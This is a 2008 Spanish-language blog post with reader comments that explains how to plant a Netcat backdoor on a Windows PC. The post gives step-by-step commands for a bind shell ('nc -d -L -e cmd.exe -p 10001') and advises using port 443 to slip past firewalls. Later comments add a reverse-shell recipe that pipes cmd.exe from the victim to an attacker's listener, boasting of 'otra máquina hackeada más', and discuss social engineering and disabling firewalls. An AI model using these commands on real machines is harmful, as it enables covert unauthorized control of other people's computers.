Como crear un backdoor en windows

08/07/2008 - 11:59:16 por Fabio Baccaglioni - 21943 - 31 - En Informática



Hace mucho que no posteaba algo de esto porque después terminan pidiendo que les reviente una cuenta de hotmail a la infiel del/la novia/novio y bueno, como que no da :P

En cuatro simples pasos se puede crear un lindo colador sin necesidad de mucho esfuerzo simplemente usando Netcat.

1.- descargar la versión para windows de Netcat
2.- Descomprimirla el nc.exe en %SYSTEMROOT%\system32
3.- Ejecutar nc -d -L -e cmd.exe -p 10001 o cualquier número que sea el puerto que deseen usar para entrar luego :P
4.- Desde cualquier máquina remota entrar con telnet a ese puerto y tienen total acceso a esa máqina.

Obviamente al cerrar la aplicación se corta la comunicación salvo que lo instalen como servicio :P

Este fabulósico recurso es cortesía de Hackosis, ya saben, cuando algo ande mal, es probable que esten en tu sistema operativo sin que lo sepas :P

Si te gustó esta nota podés...
Invitame un café en cafecito.app

Categoría: Informática Etiquetas:  
Otros posts que podrían llegar a gustarte...

Comentarios

  • 1
    Jooako9205     08/07/2008 - 12:48:11

    Che pero con un buen firewall esto igual pasa? :s

  • 2
    myNick     08/07/2008 - 13:01:22

    Se te viene una catarata de HOYGAN. :D

  • 3
    Fabio     08/07/2008 - 13:03:37


    Jooako9205 dijo:

    Che pero con un buen firewall esto igual pasa? :s


    usá el port 443 y puede pasar, obviamente, si le instalás esto a alguien lo agregás en el firewall, se supone que tuviste acceso físico a la pc

  • 4
    MaTu     08/07/2008 - 13:26:12

    Jooako9205 dijo:

    Che pero con un buen firewall esto igual pasa? :s


    Esto no pasa con ningún Firewall (ni siquiera con el de Windows) a menos que abras explícitamente el puerto. O sea, para tomar control de la máquina, tenes que tener control previamente. Desde afuera no podés ni instalarle el netcat, ni abrirle el puerto. Y si tenés acceso a la consola, pero no sos admin, tampoco podés hacerlo.

    Ahora, si ya vas a ir a tocar el firewall este mecanismo te sirve para abrir un backdoor en cualquier sistema operativo (Windows, Unix, Linux, OS X, VMS, etc).

  • 5
    Fabio     08/07/2008 - 13:37:32


    MaTu dijo:

    Jooako9205 dijo:
    Che pero con un buen firewall esto igual pasa? :s


    Esto no pasa con ningún Firewall (ni siquiera con el de Windows) a menos que abras explícitamente el puerto. O sea, para tomar control de la máquina, tenes que tener control previamente. Desde afuera no podés ni instalarle el netcat, ni abrirle el puerto. Y si tenés acceso a la consola, pero no sos admin, tampoco podés hacerlo.

    Ahora, si ya vas a ir a tocar el firewall este mecanismo te sirve para abrir un backdoor en cualquier sistema operativo (Windows, Unix, Linux, OS X, VMS, etc).


    tal cual y a diferencia de SSH no necesitás una cuenta en particular, usa la que ya está logueada o la de sistema si es que lo instalaste como servicio.

    el tema es que cualquiera que pueda tener acceso físico a tu PC o la del laburo o lo que fuere, te instala esto y listo, accede como quiere. Es otro detalle más de lo que se puede hacer:P

  • 6
    Alejandro(no lo puedo usar mas)?     08/07/2008 - 13:39:34

    En realidad, no creo que haga falta acceso a la maquina fisica para instalar esto.
    Con un poco de ingenieria social todo es posible.
    Primero le mandas un video que abra el puerto en el firewall y despues le mandas el otro que se instala y te deja abierta la cosa

  • 7
    chimango     08/07/2008 - 13:51:20


    Fabio dijo:

    Hace mucho que no posteaba algo de esto porque después terminan pidiendo que les reviente una cuenta de hotmail a la infiel del/la novia/novio y bueno, como que no da

    tenés suerte; hace un tiempo una vecina me pidió que le haga la carta astral :-p (estudio astronomía)

  • 8
    Leo     08/07/2008 - 14:03:10

    Pero que diferencia hay con un radmin o cualquiera de esos programas?

  • 9
    Guty     08/07/2008 - 15:36:47

    Si tengo acceso le arranco el terminal services (?)
    Aguante la navaja suiza

  • 10
    CarneDeCañon     08/07/2008 - 16:39:08


    chimango dijo:

    Fabio dijo:
    Hace mucho que no posteaba algo de esto porque después terminan pidiendo que les reviente una cuenta de hotmail a la infiel del/la novia/novio y bueno, como que no da

    tenés suerte; hace un tiempo una vecina me pidió que le haga la carta astral :-p (estudio astronomía)


    En realidad, tu vecina quería que le rasques el ombligo desde adentro...ya no saben que excusa inventar.

  • 11
    Swicher     08/07/2008 - 16:53:47

    Para los que estén interesados, en el foro de elhacker.net hay un manual sobre el netcat (bueno, también hay otros que sirven para usar el programa de distintas formas) que se encuentra <a href="http://foro.elhacker.net/tutoriales_documentacion/tutorial_de_netcat_pagravera_newbies-t65764.0.html">aqui</a> y también se pueden bajar otro manual del eMule, que esta <a href="ed2k://|file|manual_netcat_castellano_by_kliber.zip|9212|C0FF8C9C2FB26FABF1DDC6C1FC4D22E7|h=C46D67OWZ63DITRWAYETGAAZZZ3YZTUI|/">aqui</a> (espero que este comentario no sea borrado por ser considerado spam o algo así).
    chimango dijo:

    Fabio dijo:
    Hace mucho que no posteaba algo de esto porque después terminan pidiendo que les reviente una cuenta de hotmail a la infiel del/la novia/novio y bueno, como que no da

    tenés suerte; hace un tiempo una vecina me pidió que le haga la carta astral :-p (estudio astronomía)

    Pero para eso también existen programas (es mas, si te interesa, te paso uno que tengo por ahí) y algún que otro sitio de internet.

  • 12
    gastonchy     08/07/2008 - 17:53:28


    CarneDeCañon dijo:


    chimango dijo:
    Fabio dijo:
    Hace mucho que no posteaba algo de esto porque después terminan pidiendo que les reviente una cuenta de hotmail a la infiel del/la novia/novio y bueno, como que no da

    tenés suerte; hace un tiempo una vecina me pidió que le haga la carta astral :-p (estudio astronomía)


    En realidad, tu vecina quería que le rasques el ombligo desde adentro...ya no saben que excusa inventar.


    Como rascar el ombligo desde adentro, vos decis teniendo sexo ???

  • 13
    chimango     08/07/2008 - 18:30:21

    Era muy fiera. A demás, se les nota en la cara (de tontos) cuando lo dicen en serio.
    Swicher, vos lo decís enserio? (o aclaráme un programa para qué)

  • 14
    MaTu     08/07/2008 - 21:05:29

    Alejandro(no lo puedo usar mas)? dijo:

    En realidad, no creo que haga falta acceso a la maquina fisica para instalar esto.
    Con un poco de ingenieria social todo es posible.
    Primero le mandas un video que abra el puerto en el firewall y despues le mandas el otro que se instala y te deja abierta la cosa


    Wow! Y cómo haces para abrir un puerto del firewall desde un video? Incluso, si el usuario no es administrador de la máquina, cómo hacés para que cambie (voluntaria o involuntariamente) su configuración?

  • 15
    MaTu     08/07/2008 - 21:09:10

    Leo dijo:

    Pero que diferencia hay con un radmin o cualquiera de esos programas?

    Ninguno... Incluso si tenés acceso a la máquina le podés habilitar el servicio de Remote Desktop del XP y no necesitás instalarle nada.

  • 16
    Subzero     08/07/2008 - 21:32:11

    A mi me dicen The Backdoor king
    Con paciencia podes hacer cualquier backdoor. Sabelo

  • 17
    CarneDeCañon     08/07/2008 - 22:15:39


    Subzero dijo:

    A mi me dicen The Backdoor king
    Con paciencia podes hacer cualquier backdoor. Sabelo


    CAPOOO

    Estos son los comentarios que enorgullecen a la comunidad

  • 18
    Juan     09/07/2008 - 00:09:31


    Fabio dijo:


    el tema es que cualquiera que pueda tener acceso físico a tu PC o la del laburo o lo que fuere, te instala esto y listo, accede como quiere. Es otro detalle más de lo que se puede hacer:P


    No es siempre así. Por lo general las PC del laburo y cualquier PC que esté detrás de un router configurado por defecto (serviendo IPs por DHCP) están detrás de un firewall (si está bien configurado) y ahí se puede complicar un toque más reventarlas.

    Supongo que tendría que haber una regla de reenvío de paquetes desde el puerto X del router/server al puerto Y de la máquina en cuestión.

    De todas formas si tenés acceso a la red interna si podrían hacer la chanchada :D

  • 19
    KMP     09/07/2008 - 10:01:12


    Subzero dijo:

    A mi me dicen The Backdoor king
    Con paciencia podes hacer cualquier backdoor. Sabelo

    o sea que te hicieron el ort* muchas veces? :D

  • 20
    Fabio     09/07/2008 - 14:17:08


    Juan dijo:

    Fabio dijo:

    el tema es que cualquiera que pueda tener acceso físico a tu PC o la del laburo o lo que fuere, te instala esto y listo, accede como quiere. Es otro detalle más de lo que se puede hacer:P


    No es siempre así. Por lo general las PC del laburo y cualquier PC que esté detrás de un router configurado por defecto (serviendo IPs por DHCP) están detrás de un firewall (si está bien configurado) y ahí se puede complicar un toque más reventarlas.

    Supongo que tendría que haber una regla de reenvío de paquetes desde el puerto X del router/server al puerto Y de la máquina en cuestión.

    De todas formas si tenés acceso a la red interna si podrían hacer la chanchada :D


    siempre de alguna forma más complicada podés usar IE para que te sirva de proxy, no voy a explicar ahora como :D pero vas a ver a muchos troyanos usando el browser default para hacerlo.

    como podés usar tanto el puerto 80 como el 443 por el browser hay muchos troyanos que lo usan de puerta de enlace. el proxy ya lo tiene autorizado y listo.

    no es el caso que explico aquí, además, para Matu, el 90% de las PCs hogareñas son totalmente vulnerables ya que la mayoría ni el firewall de win$ tienen activo, ni hablar la enorme cantidad de virusetes que te lo desactivan sin pedir permiso.

  • 21
    Dioz Milaneza     09/07/2008 - 17:16:58


    KMP dijo:

    Subzero dijo:
    A mi me dicen The Backdoor king
    Con paciencia podes hacer cualquier backdoor. Sabelo

    o sea que te hicieron el ort* muchas veces? :D

    +1 :D

  • 22
    Swicher     09/07/2008 - 17:59:28

    chimango dijo:

    Era muy fiera. A demás, se les nota en la cara (de tontos) cuando lo dicen en serio.
    Swicher, vos lo decís enserio? (o aclaráme un programa para qué)

    Me refería a un programa para hacer cartas astrales (por ejemplo, en el eMule encontras uno que se llama "Armon", aunque probablemente haya otros mejores) y también hay sitios web que se dedican a estas cuestiones astrologicas,

    Fabio dijo:
    Juan dijo:
    Fabio dijo:

    el tema es que cualquiera que pueda tener acceso físico a tu PC o la del laburo o lo que fuere, te instala esto y listo, accede como quiere. Es otro detalle más de lo que se puede hacer:P


    No es siempre así. Por lo general las PC del laburo y cualquier PC que esté detrás de un router configurado por defecto (serviendo IPs por DHCP) están detrás de un firewall (si está bien configurado) y ahí se puede complicar un toque más reventarlas.

    Supongo que tendría que haber una regla de reenvío de paquetes desde el puerto X del router/server al puerto Y de la máquina en cuestión.

    De todas formas si tenés acceso a la red interna si podrían hacer la chanchada :D


    siempre de alguna forma más complicada podés usar IE para que te sirva de proxy, no voy a explicar ahora como :D pero vas a ver a muchos troyanos usando el browser default para hacerlo.

    como podés usar tanto el puerto 80 como el 443 por el browser hay muchos troyanos que lo usan de puerta de enlace. el proxy ya lo tiene autorizado y listo.

    no es el caso que explico aquí, además, para Matu, el 90% de las PCs hogareñas son totalmente vulnerables ya que la mayoría ni el firewall de win$ tienen activo, ni hablar la enorme cantidad de virusetes que te lo desactivan sin pedir permiso.

    Sobre los virus tenes razón, yo he leído sobre el virus Bagle/Beagle (y alguna que otra variante del mismo) y otros virus que cuando es ejecutado, y en el siguiente reinicio de la computadora, te desactivan (o eliminan) todos los servicios de seguridad, firewall y antivirus que tengas instalado.

  • 23
    Subzero     09/07/2008 - 18:09:59


    Dioz Milaneza dijo:

    KMP dijo:
    Subzero dijo:
    A mi me dicen The Backdoor king
    Con paciencia podes hacer cualquier backdoor. Sabelo

    o sea que te hicieron el ort* muchas veces? :D

    +1 :D

    Cuando quieran probar saquen turno conmigo que les descoso el orto o a los dos.

  • 24
    Nick     09/07/2008 - 20:06:13


    Subzero dijo:

    A mi me dicen The Backdoor king
    Con paciencia podes hacer cualquier backdoor. Sabelo


    <a href="http://www.fabio.com.ar/verpost.php?id_noticia=1434">Huelo un nuevo peluche</a>

    Kakers rulz, iea.

    Perdón, no lo pude evitar

  • 25
    Nick     09/07/2008 - 20:13:35


    Subzero dijo:

    Dioz Milaneza dijo:
    KMP dijo:
    Subzero dijo:
    A mi me dicen The Backdoor king
    Con paciencia podes hacer cualquier backdoor. Sabelo

    o sea que te hicieron el ort* muchas veces? :D

    +1 :D

    Cuando quieran probar saquen turno conmigo que les descoso el orto o a los dos.




    OMFG Esto puede llegar a ponerse muy bueno.

    Itś gonna be Legen... wait for it... dary :D

  • 26
    Merlina     10/07/2008 - 13:58:54


    Fabio dijo:

    Juan dijo:
    Fabio dijo:

    el 90% de las PCs hogareñas son totalmente vulnerables ya que la mayoría ni el firewall de win$ tienen activo, ni hablar la enorme cantidad de virusetes que te lo desactivan sin pedir permiso.


    fui inmediatamente al firewall, está activo. Tengo además el pc tools antivirus.
    En el laburo no me conecto y salvo razones de fuerza mayor (que el prestador me deje sin servicio de internet, lo cual es usual) no utilizo pc pública.
    Ya ni Emule utilizo
    Disculpá mi inquietud hoygan, borrá el comment en todo caso.

  • 27
    Cafeinomano     10/07/2008 - 14:49:51

    No solo sirve para tener acceso no autorizado a otras shell... Tiene muchísimas utilidades el NetCat, está muy bueno... Podés armar en unos simples pasos un servidor FTP, un SMTP, entre otros...

    Si lo que les interesa es el hack, aca tienen algunas boludeces sobre como "adornar" el netCat, y alguno de los usos complementarios que se les puede dar: http://foro.elhacker.net/hacking_basico/jugando_con_netcat-t159799.0.html

  • 28
    Martin Aberastegue     10/07/2008 - 22:52:44

    Me acorde de esto:
    http://elladodelmal.blogspot.com/2008/05/vista-local-tricks.html

  • 29
    ligthy_xd     11/07/2008 - 09:50:16

    El firewall nunca es un problema, solo hay que cortarlo, la mejor forma de acceder limpiamente a una pc es dejar un gusano que la prepare, que cambie los registros, desactive los antivirus incluso el firewall...

    Muy buena la foto!!

  • 30
    NTS94     01/07/2010 - 06:58:30

    Lo que se debe hacer para evitar que el firewall salte es ejecutar:
    <strong>nc -e cmd.exe </strong>
    Y en nuestra shell:
    <strong>nc -vv -L -p </strong>
    De esta forma, la conexión es saliente desde la máquina víctima y el firewall tan contento. Otra máquina hackeada más.

  • 31
    NTS94     01/07/2010 - 06:59:30

    Lo que se debe hacer para evitar que el firewall salte es ejecutar:
    nc -e cmd.exe host puerto
    Y en nuestra shell:
    nc -vv -L -p puerto
    De esta forma, la conexión es saliente desde la máquina víctima y el firewall tan contento. Otra máquina hackeada más

Deje su comentario:

Tranquilo, su email nunca será revelado.
La gente de bien tiene URL, no se olvide del http/https

Negrita Cursiva Imagen Enlace


Comentarios ofensivos o que no hagan al enriquecimiento del post serán borrados/editados por el administrador. Los comentarios son filtrados por ReCaptcha V3.